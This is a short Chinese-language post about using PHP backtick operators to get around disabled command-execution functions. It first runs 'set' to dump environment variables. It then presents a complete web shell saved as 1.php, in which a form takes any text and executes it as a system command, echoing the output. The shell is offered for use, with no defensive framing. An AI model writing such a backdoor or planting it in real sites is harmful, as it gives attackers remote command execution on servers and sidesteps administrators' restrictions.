绕过PHP执行命令的函数执行系统cmd命令

<?php
$evil=`set`;
echo '<pre>'.$evil.'</pre>';
?> 

　　

 

成功执行set命令，你懂的！

顺手写了个php执行cmd命令的马，保存为1.php

<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
<form action="1.php" method="post">
	<input type="text" name="html" placeholder="">
	<input type="submit" name="submit" value="fuck">
</form>
</body>
</html>
<?php
$str=$_POST['html'];
$html=`$str`;
echo $html;
?>